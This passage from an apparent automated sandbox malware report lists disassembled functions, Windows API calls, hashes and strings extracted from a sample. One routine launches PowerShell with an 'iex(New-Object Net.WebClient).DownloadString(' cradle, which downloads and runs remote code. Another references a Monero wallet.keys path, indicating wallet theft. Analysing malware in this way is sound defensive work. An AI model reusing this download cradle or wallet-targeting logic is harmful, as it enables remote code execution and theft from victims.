                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID: >=q$>=q
                                  • API String ID: 1378416451-1428759962
                                  • Opcode ID: 2d605137ea72f5c4c1de53f8a7cc3934f2091c74b086a6309cc5b9c1b6b8d775
                                  • Instruction ID: 64a4089940fc49a80d98e06336eae2615cf93ac945dfd0f0821c25df1d629ae6
                                  • Opcode Fuzzy Hash: 2d605137ea72f5c4c1de53f8a7cc3934f2091c74b086a6309cc5b9c1b6b8d775
                                  • Instruction Fuzzy Hash: 4EF0A434E58208BBDB10DFF4DC59F9FB7B9AB48700F10C254FA11A71C0E67496429B40
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0070A13C
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0070A161
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 0070A181
                                  • ReadFile.KERNEL32(000000FF,?,00000000,0070148F,00000000), ref: 0070A1AA
                                  • LocalFree.KERNEL32(0070148F), ref: 0070A1E0
                                  • CloseHandle.KERNEL32(000000FF), ref: 0070A1EA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 2cecb869dd9f910b80c53b4bad3207dd77351213f1d08abf84ccd7bc7e152cdc
                                  • Instruction ID: 0e916be3ad7f8a35f67295c0a9c989ef74fd7ca079fe301c82227c53064f4cd2
                                  • Opcode Fuzzy Hash: 2cecb869dd9f910b80c53b4bad3207dd77351213f1d08abf84ccd7bc7e152cdc
                                  • Instruction Fuzzy Hash: BD312D74A04309EFDB14CFA4D885BEEB7B5BF58304F108259E911A72D0D778AA81CFA1
                                  APIs
                                  • lstrcat.KERNEL32(?,011DE560), ref: 00714A2B
                                    • Part of subcall function 00718F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00718F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00714A51
                                  • lstrcat.KERNEL32(?,?), ref: 00714A70
                                  • lstrcat.KERNEL32(?,?), ref: 00714A84
                                  • lstrcat.KERNEL32(?,011CAC70), ref: 00714A97
                                  • lstrcat.KERNEL32(?,?), ref: 00714AAB
                                  • lstrcat.KERNEL32(?,011DDA28), ref: 00714ABF
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 00718F20: GetFileAttributesA.KERNEL32(00000000,?,00701B94,?,?,0072577C,?,?,00720E22), ref: 00718F2F
                                    • Part of subcall function 007147C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007147D0
                                    • Part of subcall function 007147C0: RtlAllocateHeap.NTDLL(00000000), ref: 007147D7
                                    • Part of subcall function 007147C0: wsprintfA.USER32 ref: 007147F6
                                    • Part of subcall function 007147C0: FindFirstFileA.KERNEL32(?,?), ref: 0071480D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 61435f33da03d7d628f165d54d07309f737b662632558b40d906ff373c7050ad
                                  • Instruction ID: e1feda759eab4d8c668e949faece651bb63549c3d3a627be1bcdbc60fbc692e2
                                  • Opcode Fuzzy Hash: 61435f33da03d7d628f165d54d07309f737b662632558b40d906ff373c7050ad
                                  • Instruction Fuzzy Hash: 4731A2F6954218A7CB24FBB4DC89EDD733DAB48300F404589B355960D1EE78A7C8CB95
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00712FD5
                                  Strings
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00712F54
                                  • <, xrefs: 00712F89
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00712F14
                                  • ')", xrefs: 00712F03
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 742d4af7c73ee09d0c284877f941df993d6022f5bf2a945fce70f259534ccf62
                                  • Instruction ID: 16bf4f88affa98090d9d64a8c0cedc2a9b53c3f2dcf16166bf64036d9c330873
                                  • Opcode Fuzzy Hash: 742d4af7c73ee09d0c284877f941df993d6022f5bf2a945fce70f259534ccf62
                                  • Instruction Fuzzy Hash: 54412DB0E11208EADB14FFA4D86ABEDB779AF14310F404459E002661D2DF782AC9CFA1
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,011DD7A8,00000000,00020119,?), ref: 00714344
                                  • RegQueryValueExA.ADVAPI32(?,011DE320,00000000,00000000,00000000,000000FF), ref: 00714368
                                  • RegCloseKey.ADVAPI32(?), ref: 00714372
                                  • lstrcat.KERNEL32(?,00000000), ref: 00714397
                                  • lstrcat.KERNEL32(?,011DE4E8), ref: 007143AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: 6cd6d53c199d0b6b0700e6766b65d4491f49fea2241d1125ce25fc52f5b6eb8f
                                  • Instruction ID: b1d9421306b8b4153be41877df0fb2ab7e017ec6f6ba3c7d9a02753448a26a3f
                                  • Opcode Fuzzy Hash: 6cd6d53c199d0b6b0700e6766b65d4491f49fea2241d1125ce25fc52f5b6eb8f
                                  • Instruction Fuzzy Hash: 7441E8B6910108EBDB14EBE0EC8AFEE737DAB88300F404559B7155B1C1EA7957C88BE1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                  • String ID:
                                  • API String ID: 3136044242-0
                                  • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction ID: 6854f2a5b325cb610a7d5b72e9c18a2d19dd0b23b397050c592da3b21058abfd
                                  • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction Fuzzy Hash: 86217C72D00618EBDF239E65CD4597F7A69EB89BD0B05C12DF80D6B215C3388D519BB0
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00716C0C
                                  • sscanf.NTDLL ref: 00716C39
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00716C52
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00716C60
                                  • ExitProcess.KERNEL32 ref: 00716C7A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 604d908a289c90df4408a67e5e856b21176ee5ded9220d0e52d7907fbd8933b3
                                  • Instruction ID: e2a320d9837698e273d3f7e06e3eee89a4ee09df431babab939e1ba3ca8835b5
                                  • Opcode Fuzzy Hash: 604d908a289c90df4408a67e5e856b21176ee5ded9220d0e52d7907fbd8933b3
                                  • Instruction Fuzzy Hash: 4A21CD75D14208ABCF04DFE8E9459EEB7B9BF48300F04852AE516B3250EB349644CB65
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00717FC7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00717FCE
                                  • RegOpenKeyExA.ADVAPI32(80000002,011CB8F8,00000000,00020119,?), ref: 00717FEE
                                  • RegQueryValueExA.ADVAPI32(?,011DDA68,00000000,00000000,000000FF,000000FF), ref: 0071800F
                                  • RegCloseKey.ADVAPI32(?), ref: 00718022
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 9333f64541862715696d296e02289007045a8c5818f5d6019d56ed45de608cbb
                                  • Instruction ID: 2ceb7cab132db0aeb785f7b04b2a779b22879976e2b4ee7cd793a22ef401ad7d
                                  • Opcode Fuzzy Hash: 9333f64541862715696d296e02289007045a8c5818f5d6019d56ed45de608cbb
                                  • Instruction Fuzzy Hash: 401191B1A89209EFD700CFC8DD45FBFBB78EB08B10F10421AF611A7280E77958409BA1
                                  APIs
                                  • StrStrA.SHLWAPI(011DE5F0,00000000,00000000,?,00709F71,00000000,011DE5F0,00000000), ref: 007193FC
                                  • lstrcpyn.KERNEL32(009D7580,011DE5F0,011DE5F0,?,00709F71,00000000,011DE5F0), ref: 00719420
                                  • lstrlen.KERNEL32(00000000,?,00709F71,00000000,011DE5F0), ref: 00719437
                                  • wsprintfA.USER32 ref: 00719457
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: dcdc4146b03250df592a2debf0bd3cd56b26ea54b6cb5c9d9330c6e20d181d01
                                  • Instruction ID: 91afabe6bf9e12d81ce1754e5b13d5790fddc1cda99b8d4eab64c93d0177055b
                                  • Opcode Fuzzy Hash: dcdc4146b03250df592a2debf0bd3cd56b26ea54b6cb5c9d9330c6e20d181d01
                                  • Instruction Fuzzy Hash: D5011E75548208FFCB04DFE8D954EAEBBB8EF48304F108249F9098B340E631AA80DB91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007012B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007012BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007012D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007012F5
                                  • RegCloseKey.ADVAPI32(?), ref: 007012FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 712f8526f6ae50582f557ad8a2dc2111cf325d78c34910efb72d610246b17338
                                  • Instruction ID: fb02f3bee99ffe963a7171b7fca1e040fa96007a1894de7bc39c5d3c69d3d084
                                  • Opcode Fuzzy Hash: 712f8526f6ae50582f557ad8a2dc2111cf325d78c34910efb72d610246b17338
                                  • Instruction Fuzzy Hash: FB013179A59209BFDB00DFD0DC49FAEB7B8EB48700F004199FB1597280E7709A409B90
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
